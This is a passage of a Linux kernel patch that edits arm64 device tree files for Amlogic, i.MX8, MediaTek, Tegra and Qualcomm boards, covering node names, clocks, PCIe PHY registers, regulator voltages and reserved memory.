+@@ -249,7 +249,7 @@
+ 		scpi_clocks: clocks {
+ 			compatible = "arm,scpi-clocks";
+ 
+-			scpi_dvfs: scpi_clocks@0 {
++			scpi_dvfs: clocks-0 {
+ 				compatible = "arm,scpi-dvfs-clocks";
+ 				#clock-cells = <1>;
+ 				clock-indices = <0>;
+@@ -531,7 +531,7 @@
+ 			#size-cells = <2>;
+ 			ranges = <0x0 0x0 0x0 0xc8834000 0x0 0x2000>;
+ 
+-			hwrng: rng {
++			hwrng: rng@0 {
+ 				compatible = "amlogic,meson-rng";
+ 				reg = <0x0 0x0 0x0 0x4>;
+ 			};
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts b/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts
+index 6d8cc00fedc7f..5f2d4317ecfbf 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxbb-kii-pro.dts
+@@ -16,7 +16,7 @@
+ 
+ 	leds {
+ 		compatible = "gpio-leds";
+-		status {
++		led {
+ 			gpios = <&gpio_ao GPIOAO_13 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+ 			color = <LED_COLOR_ID_RED>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts
+index 9ef210f17b4aa..393d3cb33b9ee 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-phicomm-n1.dts
+@@ -18,7 +18,7 @@
+ 	leds {
+ 		compatible = "gpio-leds";
+ 
+-		status {
++		led {
+ 			label = "n1:white:status";
+ 			gpios = <&gpio_ao GPIOAO_9 GPIO_ACTIVE_HIGH>;
+ 			default-state = "on";
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts
+index b331a013572f3..c490dbbf063bf 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl-s905d-sml5442tw.dts
+@@ -79,6 +79,5 @@
+ 		enable-gpios = <&gpio GPIOX_17 GPIO_ACTIVE_HIGH>;
+ 		max-speed = <2000000>;
+ 		clocks = <&wifi32k>;
+-		clock-names = "lpo";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts b/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts
+index 6831137c5c109..a18d6d241a5ad 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl-s905w-jethome-jethub-j80.dts
+@@ -86,11 +86,11 @@
+ };
+ 
+ &efuse {
+-	bt_mac: bt_mac@6 {
++	bt_mac: bt-mac@6 {
+ 		reg = <0x6 0x6>;
+ 	};
+ 
+-	wifi_mac: wifi_mac@C {
++	wifi_mac: wifi-mac@c {
+ 		reg = <0xc 0x6>;
+ 	};
+ };
+@@ -239,7 +239,7 @@
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&i2c_b_pins>;
+ 
+-	pcf8563: pcf8563@51 {
++	pcf8563: rtc@51 {
+ 		compatible = "nxp,pcf8563";
+ 		reg = <0x51>;
+ 		status = "okay";
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi b/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
+index c3ac531c4f84a..3500229350522 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gxl.dtsi
+@@ -759,7 +759,7 @@
+ 		};
+ 	};
+ 
+-	eth-phy-mux {
++	eth-phy-mux@55c {
+ 		compatible = "mdio-mux-mmioreg", "mdio-mux";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts b/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts
+index cadba194b149b..38ebe98ba9c6b 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-sm1-bananapi-m5.dts
+@@ -17,13 +17,13 @@
+ 	compatible = "bananapi,bpi-m5", "amlogic,sm1";
+ 	model = "Banana Pi BPI-M5";
+ 
+-	adc_keys {
++	adc-keys {
+ 		compatible = "adc-keys";
+ 		io-channels = <&saradc 2>;
+ 		io-channel-names = "buttons";
+ 		keyup-threshold-microvolt = <1800000>;
+ 
+-		key {
++		button-sw3 {
+ 			label = "SW3";
+ 			linux,code = <BTN_3>;
+ 			press-threshold-microvolt = <1700000>;
+@@ -123,7 +123,7 @@
+ 		regulator-min-microvolt = <1800000>;
+ 		regulator-max-microvolt = <3300000>;
+ 
+-		enable-gpio = <&gpio_ao GPIOE_2 GPIO_ACTIVE_HIGH>;
++		enable-gpio = <&gpio_ao GPIOE_2 GPIO_OPEN_DRAIN>;
+ 		enable-active-high;
+ 		regulator-always-on;
+ 
+diff --git a/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts b/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts
+index e3486f60645a4..3d642d739c359 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-sm1-odroid-hc4.dts
+@@ -76,9 +76,17 @@
+ };
+ 
+ &cpu_thermal {
++	trips {
++		cpu_active: cpu-active {
++			temperature = <60000>; /* millicelsius */
++			hysteresis = <2000>; /* millicelsius */
++			type = "active";
++		};
++	};
++
+ 	cooling-maps {
+ 		map {
+-			trip = <&cpu_passive>;
++			trip = <&cpu_active>;
+ 			cooling-device = <&fan0 THERMAL_NO_LIMIT THERMAL_NO_LIMIT>;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm.dtsi b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+index 50ef92915c671..420ba0d6f1343 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+@@ -562,7 +562,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mm_uid: unique-id@410 {
++				imx8mm_uid: unique-id@4 {
+ 					reg = <0x4 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn.dtsi b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+index 67b554ba690ca..ba29b5b556ffa 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+@@ -563,7 +563,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mn_uid: unique-id@410 {
++				imx8mn_uid: unique-id@4 {
+ 					reg = <0x4 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp.dtsi b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+index 47fd6a0ba05ad..25630a395db56 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp.dtsi
+@@ -424,7 +424,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mp_uid: unique-id@420 {
++				imx8mp_uid: unique-id@8 {
+ 					reg = <0x8 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mq.dtsi b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+index 19eaa523564d3..4724ed0cbff94 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mq.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mq.dtsi
+@@ -592,7 +592,7 @@
+ 				#address-cells = <1>;
+ 				#size-cells = <1>;
+ 
+-				imx8mq_uid: soc-uid@410 {
++				imx8mq_uid: soc-uid@4 {
+ 					reg = <0x4 0x8>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/mediatek/mt7622.dtsi b/arch/arm64/boot/dts/mediatek/mt7622.dtsi
+index 146e18b5b1f46..7bb316922a3a9 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7622.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7622.dtsi
+@@ -435,6 +435,7 @@
+ 	pwm: pwm@11006000 {
+ 		compatible = "mediatek,mt7622-pwm";
+ 		reg = <0 0x11006000 0 0x1000>;
++		#pwm-cells = <2>;
+ 		interrupts = <GIC_SPI 77 IRQ_TYPE_LEVEL_LOW>;
+ 		clocks = <&topckgen CLK_TOP_PWM_SEL>,
+ 			 <&pericfg CLK_PERI_PWM_PD>,
+diff --git a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+index 35e01fa2d314b..fc338bd497f51 100644
+--- a/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt7986a.dtsi
+@@ -125,8 +125,7 @@
+ 		};
+ 
+ 		watchdog: watchdog@1001c000 {
+-			compatible = "mediatek,mt7986-wdt",
+-				     "mediatek,mt6589-wdt";
++			compatible = "mediatek,mt7986-wdt";
+ 			reg = <0 0x1001c000 0 0x1000>;
+ 			interrupts = <GIC_SPI 110 IRQ_TYPE_LEVEL_HIGH>;
+ 			#reset-cells = <1>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8183.dtsi b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+index 402136bfd5350..268a1f28af8ce 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8183.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8183.dtsi
+@@ -585,6 +585,15 @@
+ 		method = "smc";
+ 	};
+ 
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
++		#clock-cells = <0>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
++		clock-output-names = "clk13m";
++	};
++
+ 	clk26m: oscillator {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+@@ -968,8 +977,7 @@
+ 				     "mediatek,mt6765-timer";
+ 			reg = <0 0x10017000 0 0x1000>;
+ 			interrupts = <GIC_SPI 200 IRQ_TYPE_LEVEL_HIGH>;
+-			clocks = <&topckgen CLK_TOP_CLK13M>;
+-			clock-names = "clk13m";
++			clocks = <&clk13m>;
+ 		};
+ 
+ 		iommu: iommu@10205000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8186.dtsi b/arch/arm64/boot/dts/mediatek/mt8186.dtsi
+index 64693c17af9ec..f88d660e41540 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8186.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8186.dtsi
+@@ -47,14 +47,12 @@
+ 				core5 {
+ 					cpu = <&cpu5>;
+ 				};
+-			};
+ 
+-			cluster1 {
+-				core0 {
++				core6 {
+ 					cpu = <&cpu6>;
+ 				};
+ 
+-				core1 {
++				core7 {
+ 					cpu = <&cpu7>;
+ 				};
+ 			};
+@@ -211,10 +209,12 @@
+ 		};
+ 	};
+ 
+-	clk13m: oscillator-13m {
+-		compatible = "fixed-clock";
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
+ 		#clock-cells = <0>;
+-		clock-frequency = <13000000>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
+ 		clock-output-names = "clk13m";
+ 	};
+ 
+@@ -330,8 +330,7 @@
+ 		};
+ 
+ 		watchdog: watchdog@10007000 {
+-			compatible = "mediatek,mt8186-wdt",
+-				     "mediatek,mt6589-wdt";
++			compatible = "mediatek,mt8186-wdt";
+ 			mediatek,disable-extrst;
+ 			reg = <0 0x10007000 0 0x1000>;
+ 			#reset-cells = <1>;
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192.dtsi b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+index 6b20376191a75..ef1294d960145 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192.dtsi
+@@ -29,6 +29,15 @@
+ 		rdma4 = &rdma4;
+ 	};
+ 
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
++		#clock-cells = <0>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
++		clock-output-names = "clk13m";
++	};
++
+ 	clk26m: oscillator0 {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+@@ -149,19 +158,16 @@
+ 				core3 {
+ 					cpu = <&cpu3>;
+ 				};
+-			};
+-
+-			cluster1 {
+-				core0 {
++				core4 {
+ 					cpu = <&cpu4>;
+ 				};
+-				core1 {
++				core5 {
+ 					cpu = <&cpu5>;
+ 				};
+-				core2 {
++				core6 {
+ 					cpu = <&cpu6>;
+ 				};
+-				core3 {
++				core7 {
+ 					cpu = <&cpu7>;
+ 				};
+ 			};
+@@ -531,8 +537,7 @@
+ 				     "mediatek,mt6765-timer";
+ 			reg = <0 0x10017000 0 0x1000>;
+ 			interrupts = <GIC_SPI 233 IRQ_TYPE_LEVEL_HIGH 0>;
+-			clocks = <&topckgen CLK_TOP_CSW_F26M_D2>;
+-			clock-names = "clk13m";
++			clocks = <&clk13m>;
+ 		};
+ 
+ 		pwrap: pwrap@10026000 {
+@@ -575,6 +580,8 @@
+ 			compatible = "mediatek,mt8192-scp_adsp";
+ 			reg = <0 0x10720000 0 0x1000>;
+ 			#clock-cells = <1>;
++			/* power domain dependency not upstreamed */
++			status = "fail";
+ 		};
+ 
+ 		uart0: serial@11002000 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8195.dtsi b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+index 6f5fa7ca49013..2c2b946b614bf 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8195.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8195.dtsi
+@@ -150,22 +150,20 @@
+ 				core3 {
+ 					cpu = <&cpu3>;
+ 				};
+-			};
+ 
+-			cluster1 {
+-				core0 {
++				core4 {
+ 					cpu = <&cpu4>;
+ 				};
+ 
+-				core1 {
++				core5 {
+ 					cpu = <&cpu5>;
+ 				};
+ 
+-				core2 {
++				core6 {
+ 					cpu = <&cpu6>;
+ 				};
+ 
+-				core3 {
++				core7 {
+ 					cpu = <&cpu7>;
+ 				};
+ 			};
+@@ -244,6 +242,15 @@
+ 		status = "disabled";
+ 	};
+ 
++	clk13m: fixed-factor-clock-13m {
++		compatible = "fixed-factor-clock";
++		#clock-cells = <0>;
++		clocks = <&clk26m>;
++		clock-div = <2>;
++		clock-mult = <1>;
++		clock-output-names = "clk13m";
++	};
++
+ 	clk26m: oscillator-26m {
+ 		compatible = "fixed-clock";
+ 		#clock-cells = <0>;
+@@ -683,8 +690,7 @@
+ 		};
+ 
+ 		watchdog: watchdog@10007000 {
+-			compatible = "mediatek,mt8195-wdt",
+-				     "mediatek,mt6589-wdt";
++			compatible = "mediatek,mt8195-wdt";
+ 			mediatek,disable-extrst;
+ 			reg = <0 0x10007000 0 0x100>;
+ 			#reset-cells = <1>;
+@@ -701,7 +707,7 @@
+ 				     "mediatek,mt6765-timer";
+ 			reg = <0 0x10017000 0 0x1000>;
+ 			interrupts = <GIC_SPI 265 IRQ_TYPE_LEVEL_HIGH 0>;
+-			clocks = <&topckgen CLK_TOP_CLK26M_D2>;
++			clocks = <&clk13m>;
+ 		};
+ 
+ 		pwrap: pwrap@10024000 {
+@@ -1410,6 +1416,7 @@
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+ 			ranges = <0 0 0x11e30000 0xe00>;
++			power-domains = <&spm MT8195_POWER_DOMAIN_SSUSB_PCIE_PHY>;
+ 			status = "disabled";
+ 
+ 			u2port1: usb-phy@0 {
+diff --git a/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi b/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi
+index a44c56c1e56e5..634373a423ef6 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra210-p2597.dtsi
+@@ -1666,7 +1666,7 @@
+ 		vin-supply = <&vdd_5v0_sys>;
+ 	};
+ 
+-	vdd_cam_1v2: regulator-vdd-cam-1v8 {
++	vdd_cam_1v2: regulator-vdd-cam-1v2 {
+ 		compatible = "regulator-fixed";
+ 		regulator-name = "vdd-cam-1v2";
+ 		regulator-min-microvolt = <1200000>;
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074.dtsi b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+index a721cdd80489e..05b97b05d4462 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+@@ -137,7 +137,7 @@
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_USB1_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "gcc_usb1_pipe_clk_src";
++				clock-output-names = "usb3phy_1_cc_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -180,7 +180,7 @@
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_USB0_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "gcc_usb0_pipe_clk_src";
++				clock-output-names = "usb3phy_0_cc_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -197,9 +197,9 @@
+ 			status = "disabled";
+ 		};
+ 
+-		pcie_qmp0: phy@86000 {
+-			compatible = "qcom,ipq8074-qmp-pcie-phy";
+-			reg = <0x00086000 0x1c4>;
++		pcie_qmp0: phy@84000 {
++			compatible = "qcom,ipq8074-qmp-gen3-pcie-phy";
++			reg = <0x00084000 0x1bc>;
+ 			#address-cells = <1>;
+ 			#size-cells = <1>;
+ 			ranges;
+@@ -213,15 +213,16 @@
+ 				      "common";
+ 			status = "disabled";
+ 
+-			pcie_phy0: phy@86200 {
+-				reg = <0x86200 0x16c>,
+-				      <0x86400 0x200>,
+-				      <0x86800 0x4f4>;
++			pcie_phy0: phy@84200 {
++				reg = <0x84200 0x16c>,
++				      <0x84400 0x200>,
++				      <0x84800 0x1f0>,
++				      <0x84c00 0xf4>;
+ 				#phy-cells = <0>;
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_PCIE0_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "pcie_0_pipe_clk";
++				clock-output-names = "pcie20_phy0_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -242,14 +243,14 @@
+ 			status = "disabled";
+ 
+ 			pcie_phy1: phy@8e200 {
+-				reg = <0x8e200 0x16c>,
++				reg = <0x8e200 0x130>,
+ 				      <0x8e400 0x200>,
+-				      <0x8e800 0x4f4>;
++				      <0x8e800 0x1f8>;
+ 				#phy-cells = <0>;
+ 				#clock-cells = <0>;
+ 				clocks = <&gcc GCC_PCIE1_PIPE_CLK>;
+ 				clock-names = "pipe0";
+-				clock-output-names = "pcie_1_pipe_clk";
++				clock-output-names = "pcie20_phy1_pipe_clk";
+ 			};
+ 		};
+ 
+@@ -750,9 +751,9 @@
+ 			phy-names = "pciephy";
+ 
+ 			ranges = <0x81000000 0 0x10200000 0x10200000
+-				  0 0x100000   /* downstream I/O */
+-				  0x82000000 0 0x10300000 0x10300000
+-				  0 0xd00000>; /* non-prefetchable memory */
++				  0 0x10000>,   /* downstream I/O */
++				 <0x82000000 0 0x10220000 0x10220000
++				  0 0xfde0000>; /* non-prefetchable memory */
+ 
+ 			interrupts = <GIC_SPI 85 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -795,16 +796,18 @@
+ 		};
+ 
+ 		pcie0: pci@20000000 {
+-			compatible = "qcom,pcie-ipq8074";
++			compatible = "qcom,pcie-ipq8074-gen3";
+ 			reg = <0x20000000 0xf1d>,
+ 			      <0x20000f20 0xa8>,
+-			      <0x00080000 0x2000>,
++			      <0x20001000 0x1000>,
++			      <0x00080000 0x4000>,
+ 			      <0x20100000 0x1000>;
+-			reg-names = "dbi", "elbi", "parf", "config";
++			reg-names = "dbi", "elbi", "atu", "parf", "config";
+ 			device_type = "pci";
+ 			linux,pci-domain = <0>;
+ 			bus-range = <0x00 0xff>;
+ 			num-lanes = <1>;
++			max-link-speed = <3>;
+ 			#address-cells = <3>;
+ 			#size-cells = <2>;
+ 
+@@ -812,9 +815,9 @@
+ 			phy-names = "pciephy";
+ 
+ 			ranges = <0x81000000 0 0x20200000 0x20200000
+-				  0 0x100000   /* downstream I/O */
+-				  0x82000000 0 0x20300000 0x20300000
+-				  0 0xd00000>; /* non-prefetchable memory */
++				  0 0x10000>, /* downstream I/O */
++				 <0x82000000 0 0x20220000 0x20220000
++				  0 0xfde0000>; /* non-prefetchable memory */
+ 
+ 			interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -832,28 +835,30 @@
+ 			clocks = <&gcc GCC_SYS_NOC_PCIE0_AXI_CLK>,
+ 				 <&gcc GCC_PCIE0_AXI_M_CLK>,
+ 				 <&gcc GCC_PCIE0_AXI_S_CLK>,
+-				 <&gcc GCC_PCIE0_AHB_CLK>,
+-				 <&gcc GCC_PCIE0_AUX_CLK>;
+-
++				 <&gcc GCC_PCIE0_AXI_S_BRIDGE_CLK>,
++				 <&gcc GCC_PCIE0_RCHNG_CLK>;
+ 			clock-names = "iface",
+ 				      "axi_m",
+ 				      "axi_s",
+-				      "ahb",
+-				      "aux";
++				      "axi_bridge",
++				      "rchng";
++
+ 			resets = <&gcc GCC_PCIE0_PIPE_ARES>,
+ 				 <&gcc GCC_PCIE0_SLEEP_ARES>,
+ 				 <&gcc GCC_PCIE0_CORE_STICKY_ARES>,
+ 				 <&gcc GCC_PCIE0_AXI_MASTER_ARES>,
+ 				 <&gcc GCC_PCIE0_AXI_SLAVE_ARES>,
+ 				 <&gcc GCC_PCIE0_AHB_ARES>,
+-				 <&gcc GCC_PCIE0_AXI_MASTER_STICKY_ARES>;
++				 <&gcc GCC_PCIE0_AXI_MASTER_STICKY_ARES>,
++				 <&gcc GCC_PCIE0_AXI_SLAVE_STICKY_ARES>;
+ 			reset-names = "pipe",
+ 				      "sleep",
+ 				      "sticky",
+ 				      "axi_m",
+ 				      "axi_s",
+ 				      "ahb",
+-				      "axi_m_sticky";
++				      "axi_m_sticky",
++				      "axi_s_sticky";
+ 			status = "disabled";
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8953.dtsi b/arch/arm64/boot/dts/qcom/msm8953.dtsi
+index 6b992a6d56c16..85a87d058f8ab 100644
+--- a/arch/arm64/boot/dts/qcom/msm8953.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8953.dtsi
+@@ -455,7 +455,7 @@
+ 			reg = <0x1000000 0x300000>;
+ 			interrupts = <GIC_SPI 208 IRQ_TYPE_LEVEL_HIGH>;
+ 			gpio-controller;
+-			gpio-ranges = <&tlmm 0 0 155>;
++			gpio-ranges = <&tlmm 0 0 142>;
+ 			#gpio-cells = <2>;
+ 			interrupt-controller;
+ 			#interrupt-cells = <2>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-10.dts b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-10.dts
+index 7e6bce4af4410..4159fc35571a6 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-10.dts
++++ b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-10.dts
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+-/* Copyright (c) Jean Thomas <virgule@jeanthomas.me>
++/*
++ * Copyright (c) Jean Thomas <virgule@jeanthomas.me>
+  */
+ 
+ /dts-v1/;
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-101.dts b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-101.dts
+index e6a5ebd30e2f5..ad9702dd171be 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-101.dts
++++ b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead-rev-101.dts
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+-/* Copyright (c) Jean Thomas <virgule@jeanthomas.me>
++/*
++ * Copyright (c) Jean Thomas <virgule@jeanthomas.me>
+  */
+ 
+ /dts-v1/;
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+index 71e373b11de9d..465b2828acbd4 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+@@ -1,7 +1,9 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+-/* Copyright (c) 2015, LGE Inc. All rights reserved.
++/*
++ * Copyright (c) 2015, LGE Inc. All rights reserved.
+  * Copyright (c) 2016, The Linux Foundation. All rights reserved.
+- * Copyright (c) 2021, Petr Vorel <petr.vorel@gmail.com>
++ * Copyright (c) 2021-2022, Petr Vorel <petr.vorel@gmail.com>
++ * Copyright (c) 2022, Dominik Kobinski <dominikkobinski314@gmail.com>
+  */
+ 
+ /dts-v1/;
+@@ -13,6 +15,9 @@
+ /* cont_splash_mem has different memory mapping */
+ /delete-node/ &cont_splash_mem;
+ 
++/* disabled on downstream, conflicts with cont_splash_mem */
++/delete-node/ &dfps_data_mem;
++
+ / {
+ 	model = "LG Nexus 5X";
+ 	compatible = "lg,bullhead", "qcom,msm8992";
+@@ -47,7 +52,17 @@
+ 		};
+ 
+ 		cont_splash_mem: memory@3400000 {
+-			reg = <0 0x03400000 0 0x1200000>;
++			reg = <0 0x03400000 0 0xc00000>;
++			no-map;
++		};
++
++		reserved@5000000 {
++			reg = <0x0 0x05000000 0x0 0x1a00000>;
++			no-map;
++		};
++
++		reserved@6c00000 {
++			reg = <0x0 0x06c00000 0x0 0x400000>;
+ 			no-map;
+ 		};
+ 	};
+@@ -79,8 +94,8 @@
+ 		/* S1, S2, S6 and S12 are managed by RPMPD */
+ 
+ 		pm8994_s1: s1 {
+-			regulator-min-microvolt = <800000>;
+-			regulator-max-microvolt = <800000>;
++			regulator-min-microvolt = <1025000>;
++			regulator-max-microvolt = <1025000>;
+ 		};
+ 
+ 		pm8994_s2: s2 {
+@@ -236,9 +251,8 @@
+ 		};
+ 
+ 		pm8994_l26: l26 {
+-			/* TODO: value from downstream
+ 			regulator-min-microvolt = <987500>;
+-			fails to apply */
++			regulator-max-microvolt = <987500>;
+ 		};
+ 
+ 		pm8994_l27: l27 {
+@@ -252,19 +266,13 @@
+ 		};
+ 
+ 		pm8994_l29: l29 {
+-			/* TODO: Unsupported voltage range.
+ 			regulator-min-microvolt = <2800000>;
+ 			regulator-max-microvolt = <2800000>;
+-			qcom,init-voltage = <2800000>;
+-			*/
+ 		};
+ 
+ 		pm8994_l30: l30 {
+-			/* TODO: get this verified
+ 			regulator-min-microvolt = <1800000>;
+ 			regulator-max-microvolt = <1800000>;
+-			qcom,init-voltage = <1800000>;
+-			*/
+ 		};
+ 
+ 		pm8994_l31: l31 {
+@@ -273,11 +281,8 @@
+ 		};
+ 
+ 		pm8994_l32: l32 {
+-			/* TODO: get this verified
+ 			regulator-min-microvolt = <1800000>;
+ 			regulator-max-microvolt = <1800000>;
+-			qcom,init-voltage = <1800000>;
+-			*/
+ 		};
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8992.dtsi b/arch/arm64/boot/dts/qcom/msm8992.dtsi
+index f4be09fc1b151..02fc3795dbfd7 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8992.dtsi
+@@ -1,5 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+-/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
++/*
++ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
+  */
+ 
+ #include "msm8994.dtsi"
+diff --git a/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi b/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi
+index ca7c8d2e1d3d9..a60decd894291 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996-sony-xperia-tone.dtsi
+@@ -944,10 +944,6 @@
+ 	};
+ };
+ 
+-/*
+- * For reasons that are currently unknown (but probably related to fusb301), USB takes about
+- * 6 minutes to wake up (nothing interesting in kernel logs), but then it works as it should.
+- */
+ &usb3 {
+ 	status = "okay";
+ 	qcom,select-utmi-as-pipe-clk;
+@@ -956,6 +952,7 @@
+ &usb3_dwc3 {
+ 	extcon = <&usb3_id>;
+ 	dr_mode = "peripheral";
++	maximum-speed = "high-speed";
+ 	phys = <&hsusb_phy1>;
+ 	phy-names = "usb2-phy";
+ 	snps,hird-threshold = /bits/ 8 <0>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
